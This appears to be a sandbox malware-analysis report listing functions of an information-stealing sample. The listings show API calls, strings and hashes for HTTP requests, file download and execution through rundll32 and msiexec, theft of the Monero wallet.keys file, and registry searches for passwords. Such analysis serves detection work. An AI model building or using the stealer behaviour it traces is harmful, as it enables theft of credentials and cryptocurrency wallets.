InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 00406331
StrCmpCA.SHLWAPI(?,026DADC0), ref: 00406353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
HttpOpenRequestA.WININET(00000000,GET,?,026DA3D8,00000000,00000000,00400100,00000000), ref: 004063D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
InternetCloseHandle.WININET(00000000), ref: 0040653F
InternetCloseHandle.WININET(00000000), ref: 00406549
InternetCloseHandle.WININET(00000000), ref: 00406553

Strings

ERROR, xrefs: 00406457
GET, xrefs: 004063CC
ERROR, xrefs: 00406519

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$??2@ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3871519372-2509457195
Opcode ID: a16a203edefbb3d2c0ae5e87be4784f619fc59c278d4607ead9661553005fb18
Instruction ID: cbac5eee591d607aa173065357eefb87c001816e051c1cde1c99a9b9dc38779b
Opcode Fuzzy Hash: a16a203edefbb3d2c0ae5e87be4784f619fc59c278d4607ead9661553005fb18
Instruction Fuzzy Hash: AA719F71A00218EBDB24DFA0DC49FEEB775AF44704F1080AAF50A6B1D0DBB86A85CF55

Function 00414FF0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,026B6470,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415124
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415181
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415337

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00414CD0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414D08

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00414DA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DF8
Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E0F
Part of subcall function 00414DA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00414E44
Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E63
Part of subcall function 00414DA0: strtok.MSVCRT ref: 00414E7E
Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E8E

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041526B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415420
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004154EC
Sleep.KERNEL32(0000EA60), ref: 004154FB

Strings

ERROR, xrefs: 00415116
ERROR, xrefs: 004154DE
ERROR, xrefs: 00415173
ERROR, xrefs: 0041525D
ERROR, xrefs: 00415412
ERROR, xrefs: 00415329

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: e36a7d332bfb25141f2d4ca7c81fd03271148d3cb96628994a6088e6e3a6d39d
Instruction ID: 47717806d02ab2b23084bb80b202f8eeb65c1f88a6bcad5d58c416e3f74fe27f
Opcode Fuzzy Hash: e36a7d332bfb25141f2d4ca7c81fd03271148d3cb96628994a6088e6e3a6d39d
Instruction Fuzzy Hash: 1FE1A671901104AACB14FBB1EC57EED7339AF94314F40852EB40666192EF3C6B9DCB9A

Function 00412940 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

ShellExecuteEx.SHELL32(0000003C), ref: 00412CD5
ShellExecuteEx.SHELL32(0000003C), ref: 00412E6D
ShellExecuteEx.SHELL32(0000003C), ref: 00412FFA

Strings

C:\Windows\system32\msiexec.exe, xrefs: 00412FCF
.dll, xrefs: 00412CF5
<, xrefs: 00412FA0
"" , xrefs: 00412BAA
.msi, xrefs: 00412EA8
/passive, xrefs: 00412F6B
C:\Windows\system32\rundll32.exe, xrefs: 00412E42
/i ", xrefs: 00412EF4

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 00e42b531c98fa732857c3a6515d2139f222c59787799cfdb54ec585ce5bfdb6
Instruction ID: f1658c825a9884a12c356146fd8d4c6d848a61a952cd10e5c69c9f5a52c1d3c9
Opcode Fuzzy Hash: 00e42b531c98fa732857c3a6515d2139f222c59787799cfdb54ec585ce5bfdb6
Instruction Fuzzy Hash: FA121F71811108AACB14FBA1DC96FDEB778AF14314F40415EF40666192EF782BD9CFAA

Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF

lstrcat.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcat.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,026B8CB8,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00409AEA

DeleteFileA.KERNEL32(00000000), ref: 004014EF
memset.MSVCRT ref: 00401516

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401335
wallet_path, xrefs: 00401330
\Monero\wallet.keys, xrefs: 0040138D
.keys, xrefs: 0040136B

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$ChangeCopyCreateDeleteFindFreeNotificationOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3420786452-218353709
Opcode ID: e4a15c653f03919a064105079838954a040a587112e5229e8567c8d086cf1207
Instruction ID: b5eb1e2d9a8a1e3cf56e2c34e54d9e93e9a372b4459d7a8870c797c8d4c08f80
Opcode Fuzzy Hash: e4a15c653f03919a064105079838954a040a587112e5229e8567c8d086cf1207
Instruction Fuzzy Hash: AB5184B1D501186BCB14EB61DC96FED733CAF50314F4041ADB60A62092EE785BD9CBAA

Function 004060F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

InternetOpenA.WININET(00420DE2,00000001,00000000,00000000,00000000), ref: 0040615F
StrCmpCA.SHLWAPI(?,026DADC0), ref: 00406197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
InternetReadFile.WININET(q&A,?,00000400,?), ref: 0040622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
InternetCloseHandle.WININET(q&A), ref: 004062A3
InternetCloseHandle.WININET(00000000), ref: 004062B0

Strings

q&A, xrefs: 00406100, 004061CF, 004062B6, 00406174, 00406103
q&A, xrefs: 0040629F, 00406228, 0040622B, 004062A2

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Internet$CloseFileHandle$Open$??2@CrackCreateReadWritelstrcpylstrlen
String ID: q&A$q&A
API String ID: 449328342-3681770271
Opcode ID: 63de9015052ce5c958739338f7016b4a6e2630d38e3d3d7a1eeb9c3818a44d6f
Instruction ID: 439f38139d03757dc0e639f6b6df0271613160f362a72270d2c4ade6ce016e72
Opcode Fuzzy Hash: 63de9015052ce5c958739338f7016b4a6e2630d38e3d3d7a1eeb9c3818a44d6f
Instruction Fuzzy Hash: C15161B1A00218ABDB20EF50CD49FEE7779AF44305F1081ADB606B71C1DB786A95CF99

Function 00407610 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407310: memset.MSVCRT ref: 00407354
Part of subcall function 00407310: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CD0), ref: 0040737A
Part of subcall function 00407310: RegEnumValueA.ADVAPI32(00407CD0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073F1
Part of subcall function 00407310: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040744D
Part of subcall function 00407310: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407492
Part of subcall function 00407310: HeapFree.KERNEL32(00000000,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407499

lstrcat.KERNEL32(35416020,004217A0), ref: 00407646
lstrcat.KERNEL32(35416020,00000000), ref: 00407688
lstrcat.KERNEL32(35416020, : ), ref: 0040769A
lstrcat.KERNEL32(35416020,00000000), ref: 004076CF
lstrcat.KERNEL32(35416020,004217A8), ref: 004076E0
lstrcat.KERNEL32(35416020,00000000), ref: 00407713
lstrcat.KERNEL32(35416020,004217AC), ref: 0040772D
task.LIBCPMTD ref: 0040773B

Strings

: , xrefs: 0040768E

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: ea4af66432e175890d232238cdc4e6e4d9d9e436a8d2b39900d38b7316cc0590
Instruction ID: 05ed671df160738881f441edec20510396de118aefbcae7eba62044a73751e2f
Opcode Fuzzy Hash: ea4af66432e175890d232238cdc4e6e4d9d9e436a8d2b39900d38b7316cc0590
Instruction Fuzzy Hash: FC318476D00509EBCB14EBA0DD45DEF7779AF94304F14402EF502772A0CA38A946CFA9

Function 00407310 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407354
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CD0), ref: 0040737A
RegEnumValueA.ADVAPI32(00407CD0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073F1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040744D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407492
HeapFree.KERNEL32(00000000,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407499

Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB

task.LIBCPMTD ref: 00407595

Strings

Password, xrefs: 00407441

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
Instruction ID: 975b1f2fff90f96d03099a1470760af69fc6b50b1064dc5ad3510b71ddc5061f
Opcode Fuzzy Hash: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
Instruction Fuzzy Hash: 52613DB5D041689BDB24DF50CC41BDAB7B8BF48304F0081EAE689A6181DFB46BC9CF95

Function 00416FA0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00416FE2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004170A3
HeapAlloc.KERNEL32(00000000), ref: 004170AA
wsprintfA.USER32 ref: 004170E0

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Strings

\, xrefs: 00417000
:, xrefs: 00416FFC
C, xrefs: 00416FEC

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 11e96b5f598d36b5145eb5ca339976e7cb65ddbe81ead056b2f3bcd54bd5f766
Instruction ID: 54c0e4e4c236f1d7f0585d8ba6b1fa909b8b3bfc40374ef6a46e6daa0de72561
Opcode Fuzzy Hash: 11e96b5f598d36b5145eb5ca339976e7cb65ddbe81ead056b2f3bcd54bd5f766
Instruction Fuzzy Hash: 1341B1B1D04248EBDB20DFA4CC45BEEBBB8AF08714F14009DF50967281D7786A84CBA9

Function 00417BA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,026D9178,00000000,?,00420DFC,00000000,?,00000000), ref: 00417BD0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,026D9178,00000000,?,00420DFC,00000000,?,00000000,00000000), ref: 00417BD7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00417BF8
__aulldiv.LIBCMT ref: 00417C12
__aulldiv.LIBCMT ref: 00417C20
wsprintfA.USER32 ref: 00417C4C

Strings

@, xrefs: 00417BED
%d MB, xrefs: 00417C43

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

